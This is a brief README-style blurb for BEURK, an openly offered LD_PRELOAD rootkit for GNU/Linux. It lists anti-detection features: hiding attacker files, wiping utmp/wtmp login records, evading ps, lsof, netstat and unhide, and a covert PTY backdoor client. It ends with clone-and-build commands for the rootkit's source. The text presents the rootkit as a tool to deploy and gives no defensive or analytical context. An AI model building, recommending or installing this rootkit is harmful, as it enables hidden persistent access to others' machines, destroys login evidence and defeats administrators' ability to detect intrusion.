BEURK is a userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
- Hide attacker files and directories
- Realtime log cleanup (on utmp/wtmp)
- Anti process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
git clone https://github.com/unix-thrust/beurk.git cd beurk make